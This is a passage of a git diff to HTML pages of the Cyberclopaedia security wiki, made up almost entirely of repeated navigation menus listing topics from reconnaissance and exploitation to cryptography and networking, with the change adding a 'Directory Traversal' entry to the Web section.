      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -221,22 +221,6 @@

- - diff --git a/docs/Reverse Engineering/Program Anatomy/The Heap.html b/docs/Reverse Engineering/Program Anatomy/The Heap.html index 18c3f8fb..ce44f36c 100644 --- a/docs/Reverse Engineering/Program Anatomy/The Heap.html +++ b/docs/Reverse Engineering/Program Anatomy/The Heap.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -315,22 +315,6 @@

Deallocation - - diff --git a/docs/Reverse Engineering/Program Anatomy/The Stack.html b/docs/Reverse Engineering/Program Anatomy/The Stack.html index 66fcc7ac..c482ef81 100644 --- a/docs/Reverse Engineering/Program Anatomy/The Stack.html +++ b/docs/Reverse Engineering/Program Anatomy/The Stack.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
